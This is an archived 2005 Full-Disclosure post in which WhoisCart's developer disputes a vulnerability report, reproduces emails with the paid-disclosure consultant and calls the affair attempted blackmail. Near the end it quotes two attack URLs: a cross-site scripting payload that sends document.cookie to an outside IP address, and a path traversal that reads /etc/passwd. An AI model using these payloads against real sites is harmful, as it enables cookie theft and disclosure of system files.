| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri Jul 8 08:35:05 2005
From: saeven at saeven.net (S. Alexandre M. Lemaire)
Subject: Multiple Vulnerabilities in Saeven.net's
WhoisCart software.
It's unfortunate that a community whose posts are meant to be useful, become littered with individuals who result to abasement and personal insults. It's convenient however that only the last few bits of a conversation between myself and Elzar (aka Vic Fryzel) figure as basis and closing statement vulnerability report which this reply is intended to:
http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034690.html
To clarify the situation, since we're on open grounds here, I'll post the pertinent emails. This is what I get in my inbox at the end of a normal day:
Email #1
_______
Hello.
My name is Vic Fryzel, and I am a private security consultant. Recently, I have found a major vulnerability in your WhoisCart software that allows for unauthorized client and administrative logins. I'm mailing in hopes of privately disclosing this vulnerability to you. My services come with a fee of $500 USD per vulnerability, with half of that fee paid up front, and the other half paid upon delivery of the vulnerability.Delivery of the vulnerability will come in a detailed report,
stating how to reproduce the vulnerability, why the vulnerability occurs, and how to fix the vulnerability. The second half of the payment should come upon your successful reproduction of the vulnerability, which in this case should not be at all hard.
Thankyou for your time.
Warm regards,
Vic Fryzel
vic@...llsage.com
Response #1 (from myself)
____________________
This message is definitely difficult to digest at its contents come unfounded. Unfortunately we cannot honor it as is, since you provide no basis, or proof for what you suggest. Further, the grounds on which you present this opportunistic proposal are legally unsound; whilst not interested in pursuing legalities however, I'll extend you a chance to first prove your claim without initially disclosing the substance of what you suggest. If proven, we can discuss a contractual agreement, where we could also dicuss your fee for the consultancy; and viability of contract. Signed and agreed, we'll gladly exchange your fee for the solution to the problem you suggest exists.
I've installed a whois.cart for you at:
(url removed)
My request is that you give me the particulars of the first hosting account listed in the hosts section. If you can give me these details within 12 hours, I will gladly entertain your proposal, and continue discussion with you as applicable to your initial proposal, and the aforementioned engagements.
____________________
After this point the dodgy conversations continued after I'd made a test environment fully available to Vic. Vic couldn't make good on his initial claim, and never was able to reveal a single thing. He later admits:
Vic Fryzel aka Elzar Stuffenbach : 6/20/2005 11:05 PM:
"Hey,Ah; I'm pretty sure that last night I was able to duplicate this
vulnerability in more places, but I'll take your word for it. Regardless, I
was "wrong" in my initial findings. However, I have a new finding, and I
don't have SSH access to your test server. I can prove it to you, come up
with a test environment for proof."
The falsified claims and unfounded "new vulnerabilities" (new attempts at a quick $500?) continue for another 3-4 emails, something here, there (in a Seussian dizziness) and in closure to a string of resultless attempts Vic attempts anew:
Vic Fryzel aka Elzar Stuffenbach : 6/22/2005 11:05 PM:
"Hey Alexandre, so, I've been able to actually recreate the first vulnerability (javascript), under a different scenario on your test setup.Let me know how you'd like to proceed.Vic"
Still however, the hosting item in the admin list was never yet revealed! It was obvious then, that Vic couldn't make good on his claim - what credibility is then left? None. Blackmail attempts aren't all that new to any software company. We'll of course dismiss the affair, and thank him for his efforts. Elzar concluded instead with an email which resorted to insults, to which I replied a message which was only conveniently partially copied in his post here - I'll paste it in its entirety here - seems he left out the part that clearly stated his efforts had failed:
____________________
I'll indulge your comments.
The truth is that I don't maintain the work on whois.cart currently. I have a staff of 13 people working for me right now, the developments are intense and I don't have the time to monitor them as I usually would. They package and operate independently from myself. My user community knows well (as I post frequent updates in the forums) that I'm currently vested into
our other project, our helpdesk. We have a user base of 3000+, you aren't the only one to submit bug reports - note also that the people that work for me, aren't bored teenagers. They are people with M.Scs and PhDs in computer science and related fields, who've agreed to partake in the whois.cart project on their spare time initially. Your concern for security, is not
exclusive.
Calling me a liar doesn't change the fact that Sunday's claim, still unfounded, has you upset at me just today for some completely unrelated and absurd reason. Admit that from my point of view, this is absolutely outlandish. More than 48 hours have passed during which you could have substantiated your claim.
I'll leave the testbed running 2.2.80 until Friday as promised. Again, if you can make good on your initial claim, I'll honor it to all ends even though your propositions are increasedly shady, and that you've resulted to insults and abasement in the process. We're people of our word, and I'llhold to that - whatever your motives are. Tact goes a longer way though, we generously reward people in our user community that do genuinely find what you had claimed to have found.
____________________
Never a peep past this. What is interesting though, is that instead of posting REAL links to the cart in his report - we get fictitious links - why not try it for yourselves?
http://yourdomain.com/whoiscart/profile.php?page=INSERT_JAVASCRIPT_HERE
becomes
http://whoiscart.net/demo/profile.php?page=%3Cbody+onload%3Ddocument.forms%5B0%5D.submit%28document.cookie%29%3E%3Cform+name%3Dform1+action%3Dhttp%3A%2F%2F12.202.41.221%2F%7Evic%2Ftest.php%3E%3C%2Fform%3E%3C%2Fbody%3E
Further, the file-browse fabrication would work like this:
http://whoiscart.net/demo/index.php?language=../../../../../../../../../../../../../etc/passwd%00
Lastly, as reply to the "Workaround" paragraph, Elzar brings up completely unrelated material into something that has nothing to do with Whois.Cart! What's worse, is vic's own website, no links work, script errors appear left and right - these things are taken into consideration when such a claim is made. In the end, the claim followed his site's suit. Unfounded, and unfinished.
From: Vic Fryzel <vic@...llsage.com>
http://shellsage.com
This said, damage control has that unfortunately this individual's failed attempt at blackmail has resorted in a rather rapid propagation of these repeated falsifications all over vulnerability and
security report sites. If you operate such a site and read this, I would appreciate if you remove this resource. Do feel free to contact us first hand, myself personally at [saeven at saeven dot net] if you require any type of tangible testing or proof; I'll gladly give you access to the same test environment that Vic/Elzar was given. All sites that we've contacted in conjunction with their reports based on this email have removed it immediately, aside from Secunia which have yet to act.
Our product, and foremost, our users are of utmost importance, and we cannot have their peace of mind polluted with someones retort to a botched blackmail attempt.
Cordially.
Alexandre
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050708/0822983d/attachment.html
Powered by blists - more mailing lists